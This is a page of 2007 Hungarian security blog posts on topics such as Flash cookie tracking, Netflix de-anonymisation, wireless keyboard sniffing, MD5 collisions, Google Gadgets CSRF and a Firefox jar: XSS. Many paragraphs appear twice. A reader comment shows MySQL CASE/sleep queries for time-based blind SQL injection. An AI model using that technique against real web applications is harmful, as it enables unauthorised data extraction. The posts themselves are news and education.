Rajtam kívül szerintem nem sokan látták, de a nagy vihart kavart ProArtos/Hangfoglalásos poszthoz nem rég hozzászóltak a Hangfoglalás illetékesei. Tanulságos történet, olvassátok végig!
A Hangfoglalás hangjai
2007.12.07. 10:00 | buherator | 10 komment
Címkék: etika olvasó ír hangfoglalás
Böngészőközi felhasználókövetés
2007.12.06. 20:08 | buherator | 2 komment
Tom Shannon elég meghökkentő (bár egyelőre csak Windwoson működő, a Linuxos Firefoxot pedig talán fagyasztó) példaprogramot tett közzé annak illusztrálására, hogy hogyan lehet egy felhasználót úgy is távolról nyomon követni, hogy közben a delikvens böngészőt vált (vagy éppen proxy mögé bújik). A módszer lényege az, hogy az oldal egy SWF SharedObject objektumán keresztül "extraperzisztens" sütit pakol a látogató gépére, amely azután kizárólag manuálisan törölhető és hozzáférhető lesz az összes böngésző számára.
Egy elég jó összefoglaló található itt a Flash sütikről. Ebből kiderül eltávolításuk és letiltásuk módja is:
Mint arra pdp is felhívja a figyelmet (valamint az eredeti publikációból hiányzó kódrészleteket is közzéteszi), ez a lehetőség utat ad hatékonyabb tracker cookie-k gyártására, de az igazán kellemetlen az lenne ha valaki mindenféle malware-t kezdene bedobálni a kedves netezők Flash lejátszóiba (tartsuk észben, hogy ezek a sütik bináris adatokat tárolnak!).
Egy elég jó összefoglaló található itt a Flash sütikről. Ebből kiderül eltávolításuk és letiltásuk módja is:
- Windows alatt a sütik itt találhatóak: Documents and Settings\userName\Application Data\Macromedia\Flash Player\#SharedObjects. Innen kell a megfelelő .so vagy .sol kiterjesztésű filet egyszerűen letörölni.
- A Flash Playernek letilthatjuk a merevlemez írását, ha a Beállításoknál a megfelelő kvótát 0-ra állítjuk.
Mint arra pdp is felhívja a figyelmet (valamint az eredeti publikációból hiányzó kódrészleteket is közzéteszi), ez a lehetőség utat ad hatékonyabb tracker cookie-k gyártására, de az igazán kellemetlen az lenne ha valaki mindenféle malware-t kezdene bedobálni a kedves netezők Flash lejátszóiba (tartsuk észben, hogy ezek a sütik bináris adatokat tárolnak!).
Címkék: flash privacy süti anonimitás
Névtelen adatbázisok, névvel ellátva
2007.12.05. 00:42 | buherator | Szólj hozzá!
A Texasi Egyetem két kutatója, Arvind Narayanan (végzős diák) és prof. Vitaly Shmatikov olyan eljárást mutatott be, melynek segítségével "névtelenített" adatbázisokból lehet konkrét személyhez rendelt adatokat kinyerni. Elméletük bizonyításához két bárki számára hozzáférhető adatbázist használtak: az IMDb-t, és a Netflix-et.
Előbbit azt hiszem nem szükséges bemutatnom, utóbbit viszont annál inkább: a Netflix egy online videótéka, melynek felhasználói a kölcsönzés után értékelhetik is a megtekintett filmeket - mint az IMDb-n. A dolog érdekessége az, hogy a rendszer a leadott értékelések alapján újabb filmeket ajánl a mozizni vágyóknak. Ehhez természetesen egy speciális algoritmus szükséges, amely rendelkezésre is áll, de a Netflix egy verseny keretében keresi az algoritmus további fejlesztési lehetőségeit. Konkrétabban a cég egy halom pénzzel jutalmazza azt, aki a meglévő algoritmusnál 10%-kal jobbat talál ki, valamint minden évben 50.000$ üti a markát annak, aki az adott évben a legfigylemreméltóbb eredményt tudta elérni. Van magyar csapat is, a műegyetem MIT tanszékéről, akik jelenleg 5. helyen állnak a versenyben. Nem rossz mi?
Nade térjünk vissza a texasi adatbányászokhoz. Világos, hogy a Netflix a versenyéhez rendelkezésre kell hogy bocsásson egy jelentős méretű adatbázist, ami alapján a versenyzők tesztelhetik a munkájukat, illetve megítélhetik algoritmusuk hatékonyságát a Netflix szoftverével szemben. A Netflix persze vigyáz felhasználói magánszférájára, ezért az adatbázisban mindenkit valamilyen semleges azonosító reprezentál. Amit hőseink műveltek, az nem más, mint hogy fogták ezt az adathalmazt, összevetették néhány tucat IMDb-n regisztrált felhasználó adataival, és az eljárás végén sikerült néhány embert beazonosítaniuk! Persze mit érünk azzal, ha tudjuk, hogy valaki milyen filmeket szeret? Nos, a kutatóknak egy személyről pl. sikerült gyakorlatilag egyértelműen megállapítani a homoszexualitáshoz és a valláshoz való viszonyát...igen kellemetlen.
A Shmatikov felhívja a figyelmet, hogy ilyen jellegű adatok nyilvánosságra hozatalakor nem elég egyszerűen a személyes adatokat eltüntetni, hiszen az egyéb információk is könnyen azonosíthatóvá tehetik az adatbázisban tárolt személyeket.
Előbbit azt hiszem nem szükséges bemutatnom, utóbbit viszont annál inkább: a Netflix egy online videótéka, melynek felhasználói a kölcsönzés után értékelhetik is a megtekintett filmeket - mint az IMDb-n. A dolog érdekessége az, hogy a rendszer a leadott értékelések alapján újabb filmeket ajánl a mozizni vágyóknak. Ehhez természetesen egy speciális algoritmus szükséges, amely rendelkezésre is áll, de a Netflix egy verseny keretében keresi az algoritmus további fejlesztési lehetőségeit. Konkrétabban a cég egy halom pénzzel jutalmazza azt, aki a meglévő algoritmusnál 10%-kal jobbat talál ki, valamint minden évben 50.000$ üti a markát annak, aki az adott évben a legfigylemreméltóbb eredményt tudta elérni. Van magyar csapat is, a műegyetem MIT tanszékéről, akik jelenleg 5. helyen állnak a versenyben. Nem rossz mi?
Nade térjünk vissza a texasi adatbányászokhoz. Világos, hogy a Netflix a versenyéhez rendelkezésre kell hogy bocsásson egy jelentős méretű adatbázist, ami alapján a versenyzők tesztelhetik a munkájukat, illetve megítélhetik algoritmusuk hatékonyságát a Netflix szoftverével szemben. A Netflix persze vigyáz felhasználói magánszférájára, ezért az adatbázisban mindenkit valamilyen semleges azonosító reprezentál. Amit hőseink műveltek, az nem más, mint hogy fogták ezt az adathalmazt, összevetették néhány tucat IMDb-n regisztrált felhasználó adataival, és az eljárás végén sikerült néhány embert beazonosítaniuk! Persze mit érünk azzal, ha tudjuk, hogy valaki milyen filmeket szeret? Nos, a kutatóknak egy személyről pl. sikerült gyakorlatilag egyértelműen megállapítani a homoszexualitáshoz és a valláshoz való viszonyát...igen kellemetlen.
A Shmatikov felhívja a figyelmet, hogy ilyen jellegű adatok nyilvánosságra hozatalakor nem elég egyszerűen a személyes adatokat eltüntetni, hiszen az egyéb információk is könnyen azonosíthatóvá tehetik az adatbázisban tárolt személyeket.
Címkék: privacy anonimitás netflix
Megtört vezetéknélküli perifériák
2007.12.04. 23:27 | buherator | 6 komment
A svájci Dreamlab csapata olyan eljárást dolgozott ki, melynek segítségével távolról hallgathatók le bizonyos Microsoft és Logitech perifériák, első sorban billentyűzetek. Az érintett termékek nem a jól bevált Bluetoth-t, hanem egy 27 MHz-es rádiófrekvenciás technológiát használnak, amelyhez a kapcsolódó titkosítás nem kifejezetten erős. Konkrétan arról van szó, hogy az éles eszű mérnökök egy bytetal XOR-olják végig az átküldött információkat, tehát a csillagászati méretűnek nem nevezhető, 256 elemű kulcstéren kell átrágnia magát a megfelelő brute-force algoritmusnak. A támadáshoz mindössze egy egyszerű rádió, és a fennti bruteforcer szükséges, ezek birtokában elvileg tíz méter távolságon belül lehallgathatjuk a Microsoft Wireless Optical Desktop 1000 és 2000 típusú billentyűzeteket, de az érintett termékek listája ennél minden bizonnyal sokkal szélesebb (több más termékről is ismert, hogy hasonló technológiára épül), és jobb rádióval a hatótáv is növelhető elvileg.
A megjelent anyagot innen tudjátok letölteni, és készült egy videó is, ami prezentálja a támadást. Szemfülesek észrevehetik, hogy ez utóbbi anyagot a remote-exploit.org hosztolja, nem kizárt tehát, hogy az egyelőre PoC stádiumban lévő billentyűzetfigyelő alkalmazás megjelenik a következő BackTrack verzióban is.
A megjelent anyagot innen tudjátok letölteni, és készült egy videó is, ami prezentálja a támadást. Szemfülesek észrevehetik, hogy ez utóbbi anyagot a remote-exploit.org hosztolja, nem kizárt tehát, hogy az egyelőre PoC stádiumban lévő billentyűzetfigyelő alkalmazás megjelenik a következő BackTrack verzióban is.
Címkék: microsoft logitech keylogger
Konvergencia
2007.12.02. 21:38 | buherator | 1 komment
Éppen az előző Playstationös poszt kommentjeiben filozofáltam az MD5 támadásairól mikor befutott a hír: új ütköztetéses támadást hajtottak végre az MD5 ellen, méghozzá egy PS3 segítségével!
A támadás eredményeként két eltérő funkcionalitású, de azonos MD5 hash-sel rendelkező bináris programot állítottak elő holland kutatók. Ilyenről már volt szó nem is olyan régen, az újdonság a dologban az, hogy ezúttal az üzenetek meglévő blokkjaival történő trükközés helyett úgynevezett választott prefix alapú támadást sikerült végrehajtani. Ennek lényege, hogy az ütköztetendő üzeneteket (programokat) változatlanul hagyva speciális bájtokat fűznek azok végéhez, melynek eredményeként végül azonos hash-hez jutnak. A megfelelő bájtok megtalálása nyers erő módszerrel történik, a bemutatott két fájlra a Playstation két nap alatt találta meg a megfelelő szekvenciát.
A támadást gyakorlatban alkalmazni elég nehéz, de ez az eset is alátámasztja azt a nézetet, mely szerint MD5 hash-t nem szabad alkalmazni integritás illetve hitelesség ellenőrzése céljából.
Érdekesség, hogy ugyanez a kutatócsoport a beszédes nevű Nostradamus Project keretében PlayStation 3 segítségével próbálja megjósolni a közelgő amerikai elnökválasztás kimenetelét. Elég súlyos lenne ha eltalálnák, na persze az MD5-re támaszkodva nem lesz nehéz dolguk :)
A támadás eredményeként két eltérő funkcionalitású, de azonos MD5 hash-sel rendelkező bináris programot állítottak elő holland kutatók. Ilyenről már volt szó nem is olyan régen, az újdonság a dologban az, hogy ezúttal az üzenetek meglévő blokkjaival történő trükközés helyett úgynevezett választott prefix alapú támadást sikerült végrehajtani. Ennek lényege, hogy az ütköztetendő üzeneteket (programokat) változatlanul hagyva speciális bájtokat fűznek azok végéhez, melynek eredményeként végül azonos hash-hez jutnak. A megfelelő bájtok megtalálása nyers erő módszerrel történik, a bemutatott két fájlra a Playstation két nap alatt találta meg a megfelelő szekvenciát.
A támadást gyakorlatban alkalmazni elég nehéz, de ez az eset is alátámasztja azt a nézetet, mely szerint MD5 hash-t nem szabad alkalmazni integritás illetve hitelesség ellenőrzése céljából.
Érdekesség, hogy ugyanez a kutatócsoport a beszédes nevű Nostradamus Project keretében PlayStation 3 segítségével próbálja megjósolni a közelgő amerikai elnökválasztás kimenetelét. Elég súlyos lenne ha eltalálnák, na persze az MD5-re támaszkodva nem lesz nehéz dolguk :)
Címkék: playstation nostradamus kriptográfia
Nehézfegyverek - frissítve
2007.11.30. 10:24 | buherator | 14 komment
Az új-zélandi KiwiConon tartott prezentációjában egy tamsky nevű hacker (Nick Breese) különleges, Playstation 3-ra optimalizált MD5 algoritmust mutatott be.
Az hardveroptimalizáció mikéntjéről nincsenek pontos információim, a következőket lehet tudni: Egy PS3 processzora nyolc darab SIMD architektúrájú feldolgozó egységet (Synergisting Processing Element - SPE) tartalmaz, melyek 3,2 GHz-en futnak, és egy óraciklus alatt négy darab 32 bites integer műveletet tudnak végrehajtani. Az SPE-k közül egy gyárilag ki van kapcsolva, valamint a lapka tartalmaz még egy magot, amely az SPE-k vezérlését végzi. A megjelent hírek szerint tamsky hat ilyen egységet vont be a számításba, és úgy optimalizálta az algoritmust, hogy 50 órajel alatt végezzen el egy MD5 iterációt - ez 1,4 milliárd iteráció másodpercenként. Ilyen iterációból 64 kell egy hash kiszámításához. Valószínűnek tartom, hogy a maradék processzormagok végzik a kevésbé számításigényes feladatokat, pl. a bemenetek generálását és kiegészítését (padding), valamint az I/O műveleteket.
Arról nem áll rendelkezésre mért adat, hogy ez a sebesség hogyan viszonyul egy GeForce8-éhoz, szerény számításaim szerint a grafikus kártyás megoldás egyelőre veri a PlayStationt, tekintve hogy a videókártya - ugyan kisebb órajelen - sokkal több szál futtatására alkalmas, bár ár/érték arányban a két módszer már közelebb van egymáshoz (egy PlayStation3 fele olyan drága, mint az ElcomSoft alapcsomagja, ha az ember nem írja meg magának a szoftvert (vagy szerzi meg illegális csatornákon...)). Update: Breese állítása szerint százszoros sebességet tudott elérni a konzollal (Az Elcomsoft 25-szörös gyorsításról számolt be), ami elég impresszív eredmény, már ha igaz. Arra minden esetre kiválóan használható az ötlet, hogy vetessünk magunknak egy Playstationt a főnökkel, szigorúan kutatási célra (itt van egy kis segítség a kezdéshez).
A másik nagyágyú az Amazon EC2 (Elastic Compute Cloud) projectje, melynek keretében a cég Xen virtualizált gépeket (pontosabban azok teljesítményét) ad bérbe elég olcsón. Egy 1,7 GHz-es Xeonnak megfelelő számítási teljesítményű, 1,7 GB RAM-mal megáldott virtuális masina használata óránként tíz centbe fáj (ez kevesebb mint húsz forint!). A bérlő tetszőleges operációs rendszert és alkalmazást tölthet a gépekre speciális image-ekbe csomagolva, majd egy online felületen managelheti gépei működését, a gépek természetesen hálózatba köthetők, és az internetre is kinézhetnek. Petko Petkov számításai szerint húsz ezer forintból létrehozható lenne a világ legnagyobb szivárványtáblája, de a lehetőségek tárháza tulajdonképpen végtelen. Két dolog azért nem teljesen világos számomra: 1) mekkora gépparkkal rendelkezik az Amazon, hogy be tud vállalni egy ilyen projectet 2) mit fognak kezdeni azokkal, akik ide telepítik a botnetjeik irányító központját, vagy más illegális rendszert? Várjuk a fejleményeket, addig is mindenkinek ajánlom, hogy gondolkozzon el, mihez kezdene egy ekkora rendszerrel?
Az hardveroptimalizáció mikéntjéről nincsenek pontos információim, a következőket lehet tudni: Egy PS3 processzora nyolc darab SIMD architektúrájú feldolgozó egységet (Synergisting Processing Element - SPE) tartalmaz, melyek 3,2 GHz-en futnak, és egy óraciklus alatt négy darab 32 bites integer műveletet tudnak végrehajtani. Az SPE-k közül egy gyárilag ki van kapcsolva, valamint a lapka tartalmaz még egy magot, amely az SPE-k vezérlését végzi. A megjelent hírek szerint tamsky hat ilyen egységet vont be a számításba, és úgy optimalizálta az algoritmust, hogy 50 órajel alatt végezzen el egy MD5 iterációt - ez 1,4 milliárd iteráció másodpercenként. Ilyen iterációból 64 kell egy hash kiszámításához. Valószínűnek tartom, hogy a maradék processzormagok végzik a kevésbé számításigényes feladatokat, pl. a bemenetek generálását és kiegészítését (padding), valamint az I/O műveleteket.
Arról nem áll rendelkezésre mért adat, hogy ez a sebesség hogyan viszonyul egy GeForce8-éhoz, szerény számításaim szerint a grafikus kártyás megoldás egyelőre veri a PlayStationt, tekintve hogy a videókártya - ugyan kisebb órajelen - sokkal több szál futtatására alkalmas, bár ár/érték arányban a két módszer már közelebb van egymáshoz (egy PlayStation3 fele olyan drága, mint az ElcomSoft alapcsomagja, ha az ember nem írja meg magának a szoftvert (vagy szerzi meg illegális csatornákon...)). Update: Breese állítása szerint százszoros sebességet tudott elérni a konzollal (Az Elcomsoft 25-szörös gyorsításról számolt be), ami elég impresszív eredmény, már ha igaz. Arra minden esetre kiválóan használható az ötlet, hogy vetessünk magunknak egy Playstationt a főnökkel, szigorúan kutatási célra (itt van egy kis segítség a kezdéshez).
A másik nagyágyú az Amazon EC2 (Elastic Compute Cloud) projectje, melynek keretében a cég Xen virtualizált gépeket (pontosabban azok teljesítményét) ad bérbe elég olcsón. Egy 1,7 GHz-es Xeonnak megfelelő számítási teljesítményű, 1,7 GB RAM-mal megáldott virtuális masina használata óránként tíz centbe fáj (ez kevesebb mint húsz forint!). A bérlő tetszőleges operációs rendszert és alkalmazást tölthet a gépekre speciális image-ekbe csomagolva, majd egy online felületen managelheti gépei működését, a gépek természetesen hálózatba köthetők, és az internetre is kinézhetnek. Petko Petkov számításai szerint húsz ezer forintból létrehozható lenne a világ legnagyobb szivárványtáblája, de a lehetőségek tárháza tulajdonképpen végtelen. Két dolog azért nem teljesen világos számomra: 1) mekkora gépparkkal rendelkezik az Amazon, hogy be tud vállalni egy ilyen projectet 2) mit fognak kezdeni azokkal, akik ide telepítik a botnetjeik irányító központját, vagy más illegális rendszert? Várjuk a fejleményeket, addig is mindenkinek ajánlom, hogy gondolkozzon el, mihez kezdene egy ekkora rendszerrel?
Címkék: amazon playstation grid virtualizáció kriptográfia gpu ec2
Amit a XSS-ről tudni akartál, de soha nem merted megkérdezni
2007.11.28. 16:09 | buherator | 3 komment
A Full-Disclosure listán bontakozott ki még novemberben a vita, amelynek tárgya a XSS hibák listán való publikálása volt. A reedex nevű felhasználó igen markánsan és provokatívan utasította el az ilyen jellegű felfedezések létjogosultságát, de egyúttal vitára is invitálta Petko Petkovot, valamint mindenki mást is. Az alábbiakban pdp válaszlevelét olvashatjátok, amelyekben reedex kérdéseire/állításaira reagál. Ennek az egy levélnek a bevágása elég egyoldalúan mutatja be kérdést, de úgy gondolom, hogy ez a kis értekezés jó áttekintést nyújt a témával kapcsolatban, és talán felhívja az illetékesek figyelmét itthon is a XSS támadások megelőzésének fontosságára. Aki többre vágyik, az nyomon követheti a szálat itt, és természetesen a kommentek között is várom a másként gondolkodók reakcióit.
Címkék: xss
SQL injection - időzítés
2007.11.27. 12:26 | buherator | Szólj hozzá!
Az SQL injection gyorsítós posztra érkezett egy komment _2501-től, amit azt hiszem érdemes kiemelebb helyen (itt) is közzétenni, nehogy feledésbe merüljön:
Nem rossz, tetszett a dolog, inspiráló.Köszönöm, ilyen még jöhet sok!
Teljes blind injektből több értéket visszahozni az injekten belül már ninjutsu. :)
Olyan esetben mint a fenti példa, jó megoldás lehet az if szerkezet, de feltétele hogy több érték legyen kiválasztható.
Amennyiben erre nincs lehetőség arra lenne egy alternatív javaslatom.
Bár a cím az hogy gyorsabb injekt, ez most ne zavarjon, (ha már engem sem zavar :P) csak egy alternatív lehetőséget mondok.
A kulcsszó a válaszidő.
Az sql kérést úgy kraftolom fel hogy a válaszidőből lehessen következtetni az értékre.
konkrétan:
mysql> select CASE 1 when 1 then sleep(1) when 2 then sleep(2) else '...' END;
1 row in set (1.00 sec)
mysql> select CASE 2 when 1 then sleep(1) when 2 then sleep(2) else '...' END;
1 row in set (2.01 sec)
Nem pastoltam be a teljes outputot, nem az a lényeg.
Ha egy webes alkalmazásnak küldesz be egy ilyet, akkor a kiszolgálás válaszideje a query futásának idejétől is függ, és ha ezt az időt nézed akkor tudsz következtetni egy egy értékre.
Jobb eset ha az oldalon megjelenik valahol h mennyi ideig futott a query.
Nagy terhelésű szervereken a terheltség függvényében ingadozhat a válaszidő szal nem 100%-os módszer.
Csak egy lehetőség.
Címkék: olvasó ír sql injection
Frissítsétek a QuickTime-otokat!
2007.11.26. 13:38 | buherator | Szólj hozzá!
Két héttel a legújabb, 7.3-as verzió megjelenése után buffer túlcsordulásos hibát találtak a QuickTime RTSP protokolkezelőjében. 24 órával a felfedezés után már két távoli kódfuttatásra alkalmas exploit látott napvilágot, úgyhogy mindenkinek jó lesz frissítenie hamar!
Címkék: bug quicktime
Google Gadgets CSRF
2007.11.26. 13:15 | buherator | Szólj hozzá!
A ha.ckers.org-on jelent meg Tim Strinpling egy értekezése a Google Gadgetek lehetséges CSRF támadásáról. A régi mondás, mely szerint, ha a fejlesztők egy hibáról úgy gondolják, hogy lehetetlen kihasználni, jön valami srác Finnországból és kihasználja (vagy valami ilyesmi) ismét beigazolódott: az elméletet beford néhány napon belül gyakorlatra váltotta.
Ha új Gadgetet veszünk fel az iGoogle nyitóoldalunkra, az új kütyü megjelenítési információi (jó AJAX alkalmazáshoz méltóan) XML-ben kerülnek átadásra. A baj az, hogy ennek az fájlnak betöltését idegenként is kezdeményehetjük, és bár a tartalom jó része megfelelő szűrésen esik át, egy entitás, a <screenshot> JavaScript kódot tartalmazhat. Ez ugyan csak IE6 alatt fut le img tagbe ágyazva (végre nem a Firefoxot kell szídnom :)), de ha jól emlékszem még mindig ez az első vagy második legelterjedtebb böngésző a weben. A PoC így néz ki, ha be vagytok jelentkezve a Google-be , akkor ide kattintva aktiválhatjátok a kódot a kezdőoldalatokon (azt hiszem az iGoogle szolgáltatást is engedélyezni kell).
Ha új Gadgetet veszünk fel az iGoogle nyitóoldalunkra, az új kütyü megjelenítési információi (jó AJAX alkalmazáshoz méltóan) XML-ben kerülnek átadásra. A baj az, hogy ennek az fájlnak betöltését idegenként is kezdeményehetjük, és bár a tartalom jó része megfelelő szűrésen esik át, egy entitás, a <screenshot> JavaScript kódot tartalmazhat. Ez ugyan csak IE6 alatt fut le img tagbe ágyazva (végre nem a Firefoxot kell szídnom :)), de ha jól emlékszem még mindig ez az első vagy második legelterjedtebb böngésző a weben. A PoC így néz ki, ha be vagytok jelentkezve a Google-be , akkor ide kattintva aktiválhatjátok a kódot a kezdőoldalatokon (azt hiszem az iGoogle szolgáltatást is engedélyezni kell).
Címkék: google internet explorer csrf
MD5 ütköztetés
2007.11.22. 17:20 | buherator | 2 komment
Rambo írt egy remek kis összefoglalót arról, hogy milyen elterjedt módszerek léteznek a különböző módokon tárolt jelszavak hatékony (gyors) megszerzésére. A poszt végén szóba kerül az MD5 és annak "megerősítésének" lehetősége, amelyről eszembe jutott egy szintén nem újkeletű, de annál érdekesebb és rengeteg félreértésre okot adó dolog, nevezetesen az MD5 hash-ek ütköztetési lehetőségei, amely jól illusztrálja az erős kriptográfiai algoritmusok konstruálásának hihetetlen nehézségét is. Nem fogok belemenni az MD5 vagy a hash algoritmusok ismertetésébe, ezeknek nézzen utána az akinek szüksége van rá, csapjunk rögtön a lecsóba! A módszer megismeréséhez a legjobb kiindulópont Peter Selinger idevégó oldala, amelynek egy kivonatát igyekszem most itt magyarul közzétenni.
Címkék: kriptográfia md5
Egy lépéssel a világ előtt :)
2007.11.22. 15:38 | buherator | 1 komment
Most olvasom a Hacker Webzine-en, hogy egyik román szomszédunk, bizonyos Luca SQL injection segítségével tudott XSS-et produkálni, miközben egy barátja webalkalmazását tesztelte.
Nos, ezt már a torrentrazzia alatt honfitársunk, kdavid is eljátszotta (11:47) a ProArt-tal. A hibát ott azóta részben javították, tehát a full-disclosure kvázi hatásos volt ;)
Amit fontos kiemelni az ilyen támadásokkal kapcsolatban az az, hogy át lehet vele jutni az inputellenőrzéseken is (ahogy azt Luca oldalán látjuk), érdemes tehát élesítés előtt átnézni a kódot, és kiszedni a debugoláshoz használt hibaüzeneteket!
Nos, ezt már a torrentrazzia alatt honfitársunk, kdavid is eljátszotta (11:47) a ProArt-tal. A hibát ott azóta részben javították, tehát a full-disclosure kvázi hatásos volt ;)
Amit fontos kiemelni az ilyen támadásokkal kapcsolatban az az, hogy át lehet vele jutni az inputellenőrzéseken is (ahogy azt Luca oldalán látjuk), érdemes tehát élesítés előtt átnézni a kódot, és kiszedni a debugoláshoz használt hibaüzeneteket!
Címkék: sql injection xss
Elterjedőben a biometrikus azonosítás
2007.11.21. 20:19 | buherator | Szólj hozzá!
Gareth Heyes írt egy érdekes posztot a mindennapi életbe befurakodó biometrikus azonosító rendszerekről. Íme a fordítás+egyéb gondolatok összeturmixolva:
Egy nem rég megjelent sajtóhír szerint Németország néhány szupermarketében mostantól ujjlenyomatolvasó használatával is lehet vásárolni. Az ember csak ráteszi az ujját a készülékre, és a megfelelő összeg levonódik az illető számlájáról, más szintje az autentikációnak nincs.
Örülhetnénk, hogy igen, ez már az űrkorszak, de jobban tesszük ha előbb végiggondoljuk szépen a dolgokat. Kezdjük talán azzal, hogy ujjlenyomatot szerezni majd pedig hamisítani nem kifejezetten nehéz: ajánlom a MythBusters idevágó részét (lásd lennt), valamint ezt a cikket amely szerint egy egyetemi kutatócsoport játékgyurma segítségével 90%-ban át tudta verni a leolvasókat. Persze mondhatnánk, hogy egy szupermarket közepén elkezdeni gyurmával bűvészkedni nem túl bölcs dolog, de ezzel nem zártuk ki, hogy egy elég ügyes "tolvaj" észrvétlenül tudja kivitelezni a trükköt. Petko Petkov arcképet mellékelne az ujjlenyomat-információhoz, ami talán egy közértesnéninek is megfelelő támpont lehet a csalók kiszúrásához - de az esti csúcsforgalomban nem feltétlenül.
Egy nem rég megjelent sajtóhír szerint Németország néhány szupermarketében mostantól ujjlenyomatolvasó használatával is lehet vásárolni. Az ember csak ráteszi az ujját a készülékre, és a megfelelő összeg levonódik az illető számlájáról, más szintje az autentikációnak nincs.
Örülhetnénk, hogy igen, ez már az űrkorszak, de jobban tesszük ha előbb végiggondoljuk szépen a dolgokat. Kezdjük talán azzal, hogy ujjlenyomatot szerezni majd pedig hamisítani nem kifejezetten nehéz: ajánlom a MythBusters idevágó részét (lásd lennt), valamint ezt a cikket amely szerint egy egyetemi kutatócsoport játékgyurma segítségével 90%-ban át tudta verni a leolvasókat. Persze mondhatnánk, hogy egy szupermarket közepén elkezdeni gyurmával bűvészkedni nem túl bölcs dolog, de ezzel nem zártuk ki, hogy egy elég ügyes "tolvaj" észrvétlenül tudja kivitelezni a trükköt. Petko Petkov arcképet mellékelne az ujjlenyomat-információhoz, ami talán egy közértesnéninek is megfelelő támpont lehet a csalók kiszúrásához - de az esti csúcsforgalomban nem feltétlenül.
Címkék: privacy ujjlenyomat biometria
xkcd - az 1337 sorozat
2007.11.20. 22:39 | buherator | Szólj hozzá!
Nem tudom hogy feltűnt-e, pár napja kilinkeltem az egyik kedvenc online képregényemet, az xkcd-t. A képkockákat Randall Patrick Munroe rajzolja, mostanában - miután a NASA nem hosszabbította meg a szerződését - teljes munkaidőben. A történetekben gyakran felbukkan a "kocka" humor, különböző matematikai és fizikai fogalmak fejreállítása. Az múlt héten egy öt részes - már-már eposzi méretű - történet bontakozott ki a világ legnagyobb hackeréről, olyan személyiségek főszereplésével, mint Steve Jobs vagy Richard M. Stallman (hogy csak a közismertebbeket említsem).
Alapmű, de legalábbis véleményem szerint az lesz belőle. Muszáj elolvasni, itt kezdődik!
Alapmű, de legalábbis véleményem szerint az lesz belőle. Muszáj elolvasni, itt kezdődik!
A lusták kedvéért itt van a szótár:
Nevek:
Donald Knuth, Adrian Lamo, Lawrence Lessig, Steve Jobs, Richard Stallman, Bram Cohen
Dolgok:
A* algoritmus, Dijkstra algoritmus, RSA algoritmus, Creative Commons, Riot Grrrl, RIAA, MPAA, DMCA
Címkék: kultúra képregény 1337 xkcd
Fél Anglia két lemezen
2007.11.20. 20:00 | buherator | Szólj hozzá!
Adatgazda: Őfennsége Adó és Vámhivatala
Adathordozó: 2 db. Merevlemez
Mennyiség: 25 millió
Információ jellege: Személyes adat + banki infó
Titkosított: Nem
Megújult a The Hacker Webzine
2007.11.18. 10:45 | buherator | Szólj hozzá!
Ronald van den Heetkamp oldala a The Hacker Webzine átesett a beigért változáson: elkészült egy fórum, ami témáit tekintve erősen a sla.ckers-re hasonlít - meglátjuk hogy elfér-e majd két betyár egy csárdában - , és külön szekciót kaptak a Ronald által fejlesztett eszközök is. A regisztráció nyílt, de mindenki jól fontoja meg, hogy milyen adatokat ad meg magáról ;)
Címkék: hírek hacksite
Letartóztatták az "év hackerét"
2007.11.17. 11:56 | buherator | 1 komment
Filmbe illő rendőrségi akció keretében tartóztatták le a svéd Dan Egerstadet, aki még augusztusban jutott hozzá kb. ezer kormányzati e-mail postafiók jelszavához és egyéb érzékeny adatokhoz, melyekből egy rövidebb, 100 adatot tartalmazó listát tett közzé az interneten, miután az érintettek nem reagáltak érdemben megkeresésére.
A rajtaütés során a kiérkező hatóság kikapcsolta az áramot, és kiiktattak gyakorlatilag minden elekromos eszközt a hacker házában, beleértve a hangszórókat és a telefont is (biztos ami biztos...). Egerstadet kihallgatták, és bár lopással is megvádolták - mivel nyolc Play Stationt találtak nála - végül elengedték, a házából lefoglalt számítógépeket és adathordozókat azonban valószínűleg még hónapokon keresztül vizsgálják majd. Az ügy tehát még nem zárult le, kíváncsian várjuk a folytatást
A rajtaütés során a kiérkező hatóság kikapcsolta az áramot, és kiiktattak gyakorlatilag minden elekromos eszközt a hacker házában, beleértve a hangszórókat és a telefont is (biztos ami biztos...). Egerstadet kihallgatták, és bár lopással is megvádolták - mivel nyolc Play Stationt találtak nála - végül elengedték, a házából lefoglalt számítógépeket és adathordozókat azonban valószínűleg még hónapokon keresztül vizsgálják majd. Az ügy tehát még nem zárult le, kíváncsian várjuk a folytatást
Címkék: hírek letartóztatás házkutatás dan egerstad
JarJar világuralomra tör?
2007.11.10. 15:06 | buherator | Szólj hozzá!
Már február óta ismert a Firefox egy olyan sebezhetősége, amely lehetővé teszi, hogy perzisztens XSS-et hajtsunk végre bármely site-on, ami engedélyezi felhasználói számára .zip fájlok feltöltését. A hiba a jar: protokolkezelő megvalósításában van, a probléma forrása lényegében az, hogy a böngésző külső tartományról származó kódot hajlandó futtatni az aktuális tartományon.
A hibára három napja pdp hívta fel újra a figyelmet, hangsúlyozandó annak kritikus voltát. Ma pedig beford jelentetett meg egy elég impresszív PoC kódot, ami kiolvassa a látogató Google kontaktlistáját (amennyiben be van jelentkezve), ezzel rávilágítva arra, hogy azok az oldalak is veszélyben vannak, akik nyílt átirányítást (?redirect=url) alkalmaznak - így ugyanis el lehet hitetni a böngészővel, hogy a .jar az átírányító oldalról (pl. Google) származik. A problémát tovább súlyosbítja, hogy a NoScript egyelőre nem véd az ilyen támadások ellen (bár a fejlesztői verzióba már berakták az új fícsört), valamint az antivírus programoknak is sok fejtörést lehet okozni pl. több .jar fájl egymásba ágyazásával, de érdekes támadási lehetőségeket rejt az is, hogy az OpenOffice .odt, valamint a Microsoft Office 2007 .doc formátuma a .jar-hoz hasonlóan a .zip formátumra épül.
A Mozillának csipkednie kell magát, ha be akarja tartani a szavát a "tíz kiba* nappal" kapcsolatban. Szigorú értelemben véve már el is késtek jócskán...
Tudom ajánlani az Opera böngészőt, amíg kijön a patch. Nem annyira fullos mint a Firefox, de jobb mint az Explorer, és nincs rá annyi hiba.
Update: Ma kijött a NoScript 1.1.8 "JAR Jammer", ami nevének megfelelően kiszűri ezeket a támadásokat. Nekem minden esetre már kezd kicsit fájdalmassá válni, hogy annyi bugot találnak a Firefoxban, hogy nem győzöm őket kiposztolni...
